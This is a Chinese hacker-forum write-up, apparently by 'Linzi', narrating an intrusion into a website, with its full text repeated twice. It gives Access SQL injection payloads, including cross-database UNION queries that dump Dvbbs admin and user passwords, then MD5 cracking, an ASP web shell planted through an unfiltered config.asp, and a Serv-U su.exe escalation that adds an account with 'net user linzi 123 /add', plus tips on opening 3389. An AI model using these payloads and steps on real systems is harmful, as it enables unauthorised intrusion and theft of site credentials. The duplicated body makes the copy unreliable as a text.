本来这篇我是想到X档案去发表的,后来因为一些事,所以最后还是决定直接发出来,文章写了
有好一个多月了吧。就把这篇文章送给混客联盟的兄弟们,和F.L.Y群里面的朋友。
1.起因:
这篇是专门为旁入写的。这种方法在几个月之前就有了,不过当时没有太在意,但前几天,朋
友给我一篇文章看,是angel他们写的关于access跨库查询。觉得很有意思,再加上前天渗透一
个电影网站没有头绪,刚好也用了这个方法实现终于拿下了系统权限。下面我以雨点下载系统+
动力文章+动网来模仿当时的入侵。
2.踩点:
www.xxx.com 这是一个综合类的网站,有电影,有flash,有文章,同学录.一个最新的动网论谈,默
认数据库www.xxx.com\bbs\data\dvbbs7.asp,做了防下载处理。其中,文章是最
新的动力,连打印注入漏洞都没有,不过数据库没加容错语句,所以还是暴出了路据库路径:
d:\web\database\www.asp 试了下载,发现出错,可以知道,数据库加了防下载的表段。电影站
点是静态的,而同学录没去找默认数据库,因为看不出是用哪个web,只有flash,发现有注入
漏洞,猜出表名为admin,字段名为passsword和username和id,进了后台,没看到上传点,又是
放弃。猜出了账号是admin,密为19841201
3.社会工程学
用猜出的账号和密码去登其它模块,发现除了电影可以进去,其它全失败,而电影也补上了上
传漏洞。无奈,好像只能放弃了,无聊跑去看旧书看。终于在笔记里看到了在5月份里一个高手
教我的access的跨库查询。
4.sql injection
www.xxx.com\flash\list.asp?id=1这是flash的注入点,好了,现在先查一下他的字段。
注入如下:
www.xxx.com\flash\list.asp?id=1 union select 1 from
admin
出错,一直到
www.xxx.com\flash\list.asp?id=1 union select 1,2,3 from
admin
没有出错,暴库了id的值1 这说明了3个字段。现在确定了,就可以实现access的跨库查询.
5.access跨库查询
先来暴出动网的前后台的账号和密码
id=1 union select username,1,2 from dv_admin
in"d:\web\bbs\data\dvbbs7.asp"
此主题相关图片如下:
暴出了账号hack86,再来暴密码
id=1 union select password,3,2 from admin
in"d:\web\bbs\data\dvbbs7.asp"
暴出了密码,这里不抓了,原理一样。
同样的方法暴出前台的账号
id=1 union select password,3,2 from users
in"d:\web\bbs\data\dvbbs7.asp" where username=hack86
暴出的账号和密码和前后不一定,前台有验证码,所以cookie欺骗不了。拿起工具进行了暴破。
继续注,注入语句如下:
id=1 union select l_id,3,2 from dv_log in
"d:\web\bbs\data\dvbbs7.asp"
暴出了513,说明dv_log的id值最后一条是513开始的,这里有个小窍门,动网的dv_log字段保
留着你修改过密码的的账号和密码,重要的是没有加密过。
好了,暴东西:
id=1 union select l_content,3,2 from dv_log in
"d:\web\bbs\data\dvbbs7.asp" where l_id=513
此主题相关图片如下:
一直这样暴,这种方法暴是可暴出没加密的,但是太累了,像我这种懒人,3分钟后就放弃了,
呵呵。不过给大家一个思路,所以把重点放在了动力上面。
对于上面的你其实也可以这样注:
id=1 and (select count(*) from admin in
"d:\web\bbs\data\dvbbs7.asp")
这一句是判断表名,其实的注入猜的大家很熟了,我就不多说了。
6.另类渗透-----暴力破解
用和上面的方法,暴出了动力的账号和密码。然后挂起md5cracker3.0全力暴破,终于,暴出了
一个让我吐血的密码 123456789,我狂晕,浪费偶的时间。
7.aspshell
进了动力后台,找到基本设置里找到了一个上传点,具体的大家可以看我n久以前的一个动画,
这样可以成功主要是因为动力对config.asp没有过滤,它把我们写入的东西直接放入了
config.asp这个文件里,所以只要我们往这个文件写入的东西满足asp语法就可以了。当时又通个
这种没有过滤好的思路,找到了盗帅的一个漏洞,具体的在家可以看我的另一文章。
8.灵巧的提权
上去后发现是虚拟主机,我狂晕,刚才怎么忘了旁注。真是越学越笨。上去后对虚拟机踩点,
发现,所有盘都支持不了。包括c:\winnt,还有其它几个有继承关系的文件夹,另外也试了c:\php
c:\perl,c:\inetpub等等,总之你可想到的它全禁了。运行cmd,写着拒绝访问。
拒绝访问,多美的词啊,呵呵,我要的就是这个。再找一下,发现这个虚拟机不支持php和perl.
通过砍客asp木马查到进程,里面有serv-u,不多说了,上传一个su.exe,还有一个cmd.exe
放在d:\web\database\里面,然后在调用cmd.exe的地方改为如下:
此主题相关图片如下:
再次运行ver,发现可以用了。然后输入命令
su.exe "net user linzi 123
/add"发现没有回显,晕死啊,bt的权限啊,不过没关系,这里拿出林
子的"毒门"绝招.把本来调用的d:\web\database\cmd.exe改为d:\web\database\su.exe
"net
user linzi 123 /add",其它地方随便输,然后点执行
此主题相关图片如下:
有了回显,再改调用cmd.exe,输入net user
,可爱的linzi躺在了那边.接下来的事,大家都懂了吧.
可以用cacls把所以盘都共享,可以开通他的3389等等.这里我解释一下上面提权成功的原因,系统
有给我们调用d:\web\database这个目录的权限,如我们在这里调用cmd.exe,但是没有给我们执行
的权限,所以当我们调用的东西是一个命令时,这时又因为我们又有调用的权限,所以我们的命令也
成功了.另外我后来又试了一下,直接输入c:\winnt会说找不到路径,但是如果再详细一点输入发现
可以进去,如:进到c:\winnt的子目录,如c:\winnt\temp,另外我要说的是在c:\winnt中,可执行的目录非
常的多,常见的有c:\winnt\system32\inetsrv\data
,还有c:\winnt\temp,c:\winnt\tasks等等,很多!
有空的话,大家可以自己去找,群里面断点去偷了一张权限分布图过来,这里谢一下"它"了
权限分布图(点击查看)
一次有趣的旁入入侵
作者:Linzi[F.L.Y]
来源:F.L.Y技术区&混客联盟[www.71345.com]
E-mail:chinaskyv@163.com
本来这篇我是想到X档案去发表的,后来因为一些事,所以最后还是决定直接发出来,文章写了
有好一个多月了吧。就把这篇文章送给混客联盟的兄弟们,和F.L.Y群里面的朋友。
1.起因:
这篇是专门为旁入写的。这种方法在几个月之前就有了,不过当时没有太在意,但前几天,朋
友给我一篇文章看,是angel他们写的关于access跨库查询。觉得很有意思,再加上前天渗透一
个电影网站没有头绪,刚好也用了这个方法实现终于拿下了系统权限。下面我以雨点下载系统+
动力文章+动网来模仿当时的入侵。
2.踩点:
www.xxx.com 这是一个综合类的网站,有电影,有flash,有文章,同学录.一个最新的动网论谈,默
认数据库www.xxx.com\bbs\data\dvbbs7.asp,做了防下载处理。其中,文章是最
新的动力,连打印注入漏洞都没有,不过数据库没加容错语句,所以还是暴出了路据库路径:
d:\web\database\www.asp 试了下载,发现出错,可以知道,数据库加了防下载的表段。电影站
点是静态的,而同学录没去找默认数据库,因为看不出是用哪个web,只有flash,发现有注入
漏洞,猜出表名为admin,字段名为passsword和username和id,进了后台,没看到上传点,又是
放弃。猜出了账号是admin,密为19841201
3.社会工程学
用猜出的账号和密码去登其它模块,发现除了电影可以进去,其它全失败,而电影也补上了上
传漏洞。无奈,好像只能放弃了,无聊跑去看旧书看。终于在笔记里看到了在5月份里一个高手
教我的access的跨库查询。
4.sql injection
www.xxx.com\flash\list.asp?id=1这是flash的注入点,好了,现在先查一下他的字段。
注入如下:
www.xxx.com\flash\list.asp?id=1 union select 1 from
admin
出错,一直到
www.xxx.com\flash\list.asp?id=1 union select 1,2,3 from
admin
没有出错,暴库了id的值1 这说明了3个字段。现在确定了,就可以实现access的跨库查询.
5.access跨库查询
先来暴出动网的前后台的账号和密码
id=1 union select username,1,2 from dv_admin
in"d:\web\bbs\data\dvbbs7.asp"
此主题相关图片如下:
暴出了账号hack86,再来暴密码
id=1 union select password,3,2 from admin
in"d:\web\bbs\data\dvbbs7.asp"
暴出了密码,这里不抓了,原理一样。
同样的方法暴出前台的账号
id=1 union select password,3,2 from users
in"d:\web\bbs\data\dvbbs7.asp" where username=hack86
暴出的账号和密码和前后不一定,前台有验证码,所以cookie欺骗不了。拿起工具进行了暴破。
继续注,注入语句如下:
id=1 union select l_id,3,2 from dv_log in
"d:\web\bbs\data\dvbbs7.asp"
暴出了513,说明dv_log的id值最后一条是513开始的,这里有个小窍门,动网的dv_log字段保
留着你修改过密码的的账号和密码,重要的是没有加密过。
好了,暴东西:
id=1 union select l_content,3,2 from dv_log in
"d:\web\bbs\data\dvbbs7.asp" where l_id=513
此主题相关图片如下:
一直这样暴,这种方法暴是可暴出没加密的,但是太累了,像我这种懒人,3分钟后就放弃了,
呵呵。不过给大家一个思路,所以把重点放在了动力上面。
对于上面的你其实也可以这样注:
id=1 and (select count(*) from admin in
"d:\web\bbs\data\dvbbs7.asp")
这一句是判断表名,其实的注入猜的大家很熟了,我就不多说了。
6.另类渗透-----暴力破解
用和上面的方法,暴出了动力的账号和密码。然后挂起md5cracker3.0全力暴破,终于,暴出了
一个让我吐血的密码 123456789,我狂晕,浪费偶的时间。
7.aspshell
进了动力后台,找到基本设置里找到了一个上传点,具体的大家可以看我n久以前的一个动画,
这样可以成功主要是因为动力对config.asp没有过滤,它把我们写入的东西直接放入了
config.asp这个文件里,所以只要我们往这个文件写入的东西满足asp语法就可以了。当时又通个
这种没有过滤好的思路,找到了盗帅的一个漏洞,具体的在家可以看我的另一文章。
8.灵巧的提权
上去后发现是虚拟主机,我狂晕,刚才怎么忘了旁注。真是越学越笨。上去后对虚拟机踩点,
发现,所有盘都支持不了。包括c:\winnt,还有其它几个有继承关系的文件夹,另外也试了c:\php
c:\perl,c:\inetpub等等,总之你可想到的它全禁了。运行cmd,写着拒绝访问。
拒绝访问,多美的词啊,呵呵,我要的就是这个。再找一下,发现这个虚拟机不支持php和perl.
通过砍客asp木马查到进程,里面有serv-u,不多说了,上传一个su.exe,还有一个cmd.exe
放在d:\web\database\里面,然后在调用cmd.exe的地方改为如下:
此主题相关图片如下:
再次运行ver,发现可以用了。然后输入命令
su.exe "net user linzi 123
/add"发现没有回显,晕死啊,bt的权限啊,不过没关系,这里拿出林
子的"毒门"绝招.把本来调用的d:\web\database\cmd.exe改为d:\web\database\su.exe
"net
user linzi 123 /add",其它地方随便输,然后点执行
此主题相关图片如下:
有了回显,再改调用cmd.exe,输入net user
,可爱的linzi躺在了那边.接下来的事,大家都懂了吧.
可以用cacls把所以盘都共享,可以开通他的3389等等.这里我解释一下上面提权成功的原因,系统
有给我们调用d:\web\database这个目录的权限,如我们在这里调用cmd.exe,但是没有给我们执行
的权限,所以当我们调用的东西是一个命令时,这时又因为我们又有调用的权限,所以我们的命令也
成功了.另外我后来又试了一下,直接输入c:\winnt会说找不到路径,但是如果再详细一点输入发现
可以进去,如:进到c:\winnt的子目录,如c:\winnt\temp,另外我要说的是在c:\winnt中,可执行的目录非
常的多,常见的有c:\winnt\system32\inetsrv\data
,还有c:\winnt\temp,c:\winnt\tasks等等,很多!
有空的话,大家可以自己去找,群里面断点去偷了一张权限分布图过来,这里谢一下"它"了。